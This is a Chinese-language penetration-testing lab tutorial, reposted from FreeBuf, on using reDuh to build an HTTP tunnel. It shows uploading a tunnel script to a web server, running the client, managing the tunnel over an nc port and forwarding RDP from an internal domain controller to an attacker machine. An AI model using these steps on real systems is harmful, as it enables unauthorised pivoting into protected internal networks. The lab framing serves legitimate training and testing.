reDuh搭建HTTP正向代理
reDuh搭建HTTP正向代理
reDuh是Glenn Wilkinson在2008年美国黑客大会上演示的一款正向代理工具,该工具实现了HTTP代理功能。
| 实验环境 | 系统 | IP地址 |
|---|---|---|
| DC | Windows Server 2012 R2 | 10.10.10.10(Host-Only模式) |
| WEB服务器 | Windows Server 2008 R2 | 10.10.10.80(Host-Only模式) / 192.168.111.80(Host-Only模式) |
| 攻击机 | Windows 10 | 192.168.111.11(Host-Only模式) |
本实验主要模拟渗透测试中外网主机通过代理主机访问内网服务器的场景。
DC(10.10.10.10)处于内网(10.10.10.0/24)环境中,仅允许内网主机远程连接。我们要在代理主机(10.10.10.80)上搭建HTTP正向代理,实现攻击主机远程登录内网服务器。
验证未开启reDuh代理前,攻击机与DC网络不通,远程连接127.0.0.1:1234失败。
WEB服务器可直接远程连接DC。
将reDuh.aspx程序部署到跳板主机网站根目录,访问页面结果如下:
在攻击主机上连接跳板主机上的reDuh.aspx文件,执行命令如下:java -jar reDuhClient.jar http://192.168.111.80/reDuh.aspx
使用nc.exe监听本机1010端口,对正向代理进行管理。
在正向代理管理命令行中,通过[createTunnel]local_port:remote_host:remote_port
命令创建远程主机remote_host:remote_port端口到本机local_port端口的映射,执行命令如下:[createTunnel]1234:10.10.10.10:3389
执行命令后可在reDuh客户端看到成功建立连接:
此时远程访问中输入127.0.0.1:1234即可实现对10.10.10.10主机的远程访问:
使用 ReDuh 构造合法的 HTTP 请求以建立 TCP 通道
注: ReDuh 是一个通过 HTTP 协议建立隧道传输各种其他数据的工具。其可以把内网服务器的端口通过 http/https 隧道转发到本机,形成一个连通回路。用于目标服务器在内网或做了端口策略的情况下连接目标服务器内部开放端口。
对了亲~ReDuh-Gui 号称端口转发神器哦。
https://github.com/sensepost/reDuh
步骤 1
上传 reDuh.jsp 目标服务器$ http://192.168.10.50/uploads/reDuh.jsp
步骤 2
在本机运行 reDuhClient$ java -jar reDuhClient.jar http://192.168.10.50/uploads/reDuh.jsp
步骤 3
使用 nc 连接管理端口$ nc -nvv 127.0.0.1 1010
步骤 4
使用隧道转发本地端口到远程目标端口[createTunnel] 7777:172.16.0.4:3389
步骤 5
使用 RDP 连接远程$ /usr/bin/rdesktop -g 1024x768 -P -z -x l -k en-us -r sound:off localhost:7777
转自:https://www.freebuf.com/sectool/105524.html